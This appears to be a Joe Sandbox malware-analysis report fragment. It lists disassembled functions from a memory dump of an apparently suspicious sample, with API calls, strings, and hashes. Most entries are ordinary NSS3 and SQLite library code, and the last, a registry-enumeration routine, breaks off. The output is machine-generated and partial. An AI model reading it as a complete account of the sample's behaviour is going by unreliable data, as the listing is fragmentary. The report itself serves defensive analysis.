Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 54a27465a65ebcb43a709192ff7939de053f06b73ee848deac75e98f4c414116
Instruction ID: 04f65d58f620666dcd89ae2d7b6665576d002f0ebe57b0292d3212d510baae4a
Opcode Fuzzy Hash: 54a27465a65ebcb43a709192ff7939de053f06b73ee848deac75e98f4c414116
Instruction Fuzzy Hash: 7A419DB1A04615DFCB00FF7AD494959BBF0BF46358F164629D888DB700E730E895CB8A

Function 6C578F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C578FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C578FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C578FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C579013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C579042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C57905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C579073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C5790EC

Part of subcall function 6C540F00: PR_GetPageSize.NSS3(6C540936,FFFFE8AE,?,6C4D16B7,00000000,?,6C540936,00000000,?,6C4D204A), ref: 6C540F1B
Part of subcall function 6C540F00: PR_NewLogModule.NSS3(clock,6C540936,FFFFE8AE,?,6C4D16B7,00000000,?,6C540936,00000000,?,6C4D204A), ref: 6C540F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C579111

Strings

nfl, xrefs: 6C5790A3

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID: nfl
API String ID: 2831689957-3599519066
Opcode ID: dcad934a6ae2e22c38eee62be2187aed37bad764f3a6152d2fcab77ee1d8223f
Instruction ID: e3d3093947c761d51bfb25efc979011c129a69eb0711356abb79f51e4a3df82d
Opcode Fuzzy Hash: dcad934a6ae2e22c38eee62be2187aed37bad764f3a6152d2fcab77ee1d8223f
Instruction Fuzzy Hash: 70519CB4A04605CFCB10EF79C8C8699BBF0BF4A318F055969DC459B715EB31E884CBA6

Function 6C55E910 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149memorystringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,http://,00000007), ref: 6C55E93B
PR_SetError.NSS3(FFFFE075,00000000), ref: 6C55E94E
PORT_Alloc_Util.NSS3(00000001), ref: 6C55E995
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C55E9A7
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6C55E9CA
PORT_Strdup_Util.NSS3(6C69933E), ref: 6C55EA17
PORT_Alloc_Util.NSS3(00000001), ref: 6C55EA28

Part of subcall function 6C5B0BE0: malloc.MOZGLUE(6C5A8D2D,?,00000000,?), ref: 6C5B0BF8
Part of subcall function 6C5B0BE0: TlsGetValue.KERNEL32(6C5A8D2D,?,00000000,?), ref: 6C5B0C15

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C55EA3C
free.MOZGLUE(?), ref: 6C55EA69

Strings

http://, xrefs: 6C55E935

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
String ID: http://
API String ID: 3982757857-1121587658
Opcode ID: 2dd4d2cbe2bd737c69fe0ffd9b6a6a0cbad09388a141be20acd3cc4b8b0ae2aa
Instruction ID: ca09e64672d720059a443cb57649290cdd162c7b54f0ebba56f95e310e8c9014
Opcode Fuzzy Hash: 2dd4d2cbe2bd737c69fe0ffd9b6a6a0cbad09388a141be20acd3cc4b8b0ae2aa
Instruction Fuzzy Hash: AC41AFF9D086065BDF518AB88C407EA7B75EB4730CFD40023D89497F41E29A9566C2E6

Function 6C574E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C574E90
EnterCriticalSection.KERNEL32 ref: 6C574EA9
TlsGetValue.KERNEL32 ref: 6C574EC6
EnterCriticalSection.KERNEL32 ref: 6C574EDF
PL_HashTableLookup.NSS3 ref: 6C574EF8
PR_Unlock.NSS3 ref: 6C574F05
PR_Now.NSS3 ref: 6C574F13
PR_Unlock.NSS3 ref: 6C574F3A

Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407AD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407CD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407D6
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4D204A), ref: 6C5407E4
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,6C4D204A), ref: 6C540864
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C540880
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,6C4D204A), ref: 6C5408CB
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408D7
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408FB

Strings

bUWl, xrefs: 6C574F3F
bUWl, xrefs: 6C574E5C

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bUWl$bUWl
API String ID: 326028414-1861870785
Opcode ID: 192fc174732e65e69c3d87e2309d5b3bf5146be74a6f4f1f2b0de75a58d66301
Instruction ID: ea33a05f6255dd1dc9cfccbc51ba7488d855e147498ff4f5dae9772713f3079d
Opcode Fuzzy Hash: 192fc174732e65e69c3d87e2309d5b3bf5146be74a6f4f1f2b0de75a58d66301
Instruction Fuzzy Hash: BE414CB4A04605DFCB00EF79D48486ABBF0FF49354B018569DC599B711EB30E895CFA5

Function 6C586C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C586C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C586C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C586CA3

Part of subcall function 6C66D930: PL_strncpyz.NSS3(?,?,?), ref: 6C66D963

PR_LogPrint.NSS3(?,00000000), ref: 6C586CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C586CD5

Strings

pMechanism = 0x%p, xrefs: 6C586CD0
C_DigestInit, xrefs: 6C586C61
(CK_INVALID_HANDLE), xrefs: 6C586C9C
hSession = 0x%x, xrefs: 6C586C7E, 6C586C8E
nfl, xrefs: 6C586CF4, 6C586D1F

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$nfl
API String ID: 1003633598-1217380308
Opcode ID: 24cffce86fb7c74c6625058ea4311200b136226a11d4e4b69c22814b7c937859
Instruction ID: 63291a090cae5314a435c944bcf312e8f1d2f21a8ebeb6ab0253680617e9c19e
Opcode Fuzzy Hash: 24cffce86fb7c74c6625058ea4311200b136226a11d4e4b69c22814b7c937859
Instruction Fuzzy Hash: 9621F5706022249BDB009B569D88B9A37F5EB82318F044425E509ABB41DF309918CBAE

Function 6C59ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C59DE64), ref: 6C59ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C59ED22

Part of subcall function 6C5AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6818D0,?), ref: 6C5AB095

PL_FreeArenaPool.NSS3(?), ref: 6C59ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C59ED6B
PR_CallOnce.NSS3(6C6B2AA4,6C5B12D0), ref: 6C59ED38

Part of subcall function 6C4D4C70: TlsGetValue.KERNEL32(?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4C97
Part of subcall function 6C4D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4CB0
Part of subcall function 6C4D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C59ED52
PR_CallOnce.NSS3(6C6B2AA4,6C5B12D0), ref: 6C59ED83
PL_FreeArenaPool.NSS3(?), ref: 6C59ED95
PL_FinishArenaPool.NSS3(?), ref: 6C59ED9D

Part of subcall function 6C5B64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C5B127C,00000000,00000000,00000000), ref: 6C5B650E

Strings

security, xrefs: 6C59ED06

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: f6ede77a8ed6e5feb1306f1cfe7aca8f0cc0b4216e8d6cea81958c9d71533b10
Instruction ID: 8899afa213b679c68571b6507ecb17325f1c7ad02b6a3512c68b37fb8c613809
Opcode Fuzzy Hash: f6ede77a8ed6e5feb1306f1cfe7aca8f0cc0b4216e8d6cea81958c9d71533b10
Instruction Fuzzy Hash: 6011AD71900304ABE7009722ACD5FBBB378BF8260CF05086CE80472E50FB71A91C86EA

Function 6C660EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C542357), ref: 6C660EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C542357), ref: 6C660EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C660EE6

Part of subcall function 6C6609D0: PR_Now.NSS3 ref: 6C660A22
Part of subcall function 6C6609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C660A35
Part of subcall function 6C6609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C660A66
Part of subcall function 6C6609D0: PR_GetCurrentThread.NSS3 ref: 6C660A70
Part of subcall function 6C6609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C660A9D
Part of subcall function 6C6609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C660AC8
Part of subcall function 6C6609D0: PR_vsmprintf.NSS3(?,?), ref: 6C660AE8
Part of subcall function 6C6609D0: EnterCriticalSection.KERNEL32(?), ref: 6C660B19
Part of subcall function 6C6609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C660B48
Part of subcall function 6C6609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C660C76
Part of subcall function 6C6609D0: PR_LogFlush.NSS3 ref: 6C660C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C660EFA

Part of subcall function 6C54AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C54AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C660F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C660F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C660F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C660F2B

Strings

Aborting, xrefs: 6C660EB3
Assertion failure: %s, at %s:%d, xrefs: 6C660ED9, 6C660EE5, 6C660F06, 6C660F0B

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: d717a6f71418b59189521dfc1a1d2a934919a889d7dc15b9f9babc17d42a6a80
Instruction ID: a3a7b113cb414cf85aa916b5611ac0f8dbe0f8d4f27cfc73c8ddb574c172370e
Opcode Fuzzy Hash: d717a6f71418b59189521dfc1a1d2a934919a889d7dc15b9f9babc17d42a6a80
Instruction Fuzzy Hash: 01F0A4B59001147BDB003BA2AC89C9F3E6DDF82264F004424FD0A56A02DA36F91496BB

Function 6C5C4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C5C4DCB

Part of subcall function 6C5B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5587ED,00000800,6C54EF74,00000000), ref: 6C5B1000
Part of subcall function 6C5B0FF0: PR_NewLock.NSS3(?,00000800,6C54EF74,00000000), ref: 6C5B1016
Part of subcall function 6C5B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5587ED,00000008,?,00000800,6C54EF74,00000000), ref: 6C5B102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C5C4DE1

Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B10F3
Part of subcall function 6C5B10C0: EnterCriticalSection.KERNEL32(?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B110C
Part of subcall function 6C5B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1141
Part of subcall function 6C5B10C0: PR_Unlock.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1182
Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C5C4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5C4E59

Part of subcall function 6C5AFAB0: free.MOZGLUE(?,-00000001,?,?,6C54F673,00000000,00000000), ref: 6C5AFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C68300C,00000000), ref: 6C5C4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C5C4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C5C4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5C521A

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: b1f78896c19a0674e0810fbda8f0ab4cef58fc0065e90ffa01161b47ebdc1387
Instruction ID: 815e6968d8b81afd4a30503ccad6f351ae3991c7f2e576bc6f20c6d4e55f14c8
Opcode Fuzzy Hash: b1f78896c19a0674e0810fbda8f0ab4cef58fc0065e90ffa01161b47ebdc1387
Instruction Fuzzy Hash: C6F19A71F00209CBDB04CF95D840BAEB7B2BF84318F65812DE915AB780E775E981CB92

Function 6C554FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C6A0148,?,6C566FEC), ref: 6C55502A
PR_NewLock.NSS3(00000001,00000000,6C6A0148,?,6C566FEC), ref: 6C555034
PL_NewHashTable.NSS3(00000000,6C5AFE80,6C5AFD30,6C5FC350,00000000,00000000,00000001,00000000,6C6A0148,?,6C566FEC), ref: 6C555055
PL_NewHashTable.NSS3(00000000,6C5AFE80,6C5AFD30,6C5FC350,00000000,00000000,?,00000001,00000000,6C6A0148,?,6C566FEC), ref: 6C55506D

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: bad418eb5c901e21339feda997cec849b7bceae07b254d0e9ffa436eccb7dd49
Instruction ID: 47522683bf09df912430b37a8de48d132de1eb0348b6a458b2cf762c8d45492d
Opcode Fuzzy Hash: bad418eb5c901e21339feda997cec849b7bceae07b254d0e9ffa436eccb7dd49
Instruction Fuzzy Hash: C331B3B1B012109BEF109A678C8CB4B3BF8DB13348F814526EB0997A40D3759434CBDD

Function 6C4F2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4F2F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C4F2FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C4F3005
memcpy.VCRUNTIME140(?,?,?), ref: 6C4F30EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4F3131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4F3178

Strings

%s at line %d of [%.10s], xrefs: 6C4F3171
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4F3022, 6C4F3156, 6C4F3162, 6C4F318A, 6C4F3196, 6C4F31A2, 6C4F31AE, 6C4F31BA, 6C4F31C6
database corruption, xrefs: 6C4F316C

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: a6279875f596a1432088eed19bc72664417281d1ddf9fe8a1e451a118427fb8f
Instruction ID: e61c1a2fd68075ffcee852a0decfac320fea08850f9c786d0861be0c754a398f
Opcode Fuzzy Hash: a6279875f596a1432088eed19bc72664417281d1ddf9fe8a1e451a118427fb8f
Instruction Fuzzy Hash: 8EB1AE70E052199BDB18CF9DC884EFEBBB1BF88304F14402AE855B7B45D7749942CBA5

Function 6C542D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C542D69

Strings

winUnmapfile2, xrefs: 6C542F7F
winTruncate1, xrefs: 6C542EBE
Pfl, xrefs: 6C542E74, 6C542EC5, 6C542F32, 6C542F5C
winUnmapfile1, xrefs: 6C542F55
winTruncate2, xrefs: 6C542EF8
fl, xrefs: 6C542DD0
winSeekFile, xrefs: 6C542E9C
@fl, xrefs: 6C542E24

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: __allrem
String ID: @fl$Pfl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$fl
API String ID: 2933888876-1787291713
Opcode ID: ec267a1a18f116d249e922699f8a09e74e57de152bfbb75b716767708958a461
Instruction ID: 269adca8d007d8482310b61f22ffae58e6c2c714f93d2e445a6fe301729d3db0
Opcode Fuzzy Hash: ec267a1a18f116d249e922699f8a09e74e57de152bfbb75b716767708958a461
Instruction Fuzzy Hash: BD61BD71B002159FDB04CFA9DC94AAA77B1FF89314F108628E919DB790DB31AC16CF99

Function 017E6FD0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 017E6CD0: memset.MSVCRT ref: 017E6D14
Part of subcall function 017E6CD0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,017E7690), ref: 017E6D3A
Part of subcall function 017E6CD0: RegEnumValueA.ADVAPI32(017E7690,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 017E6DB1
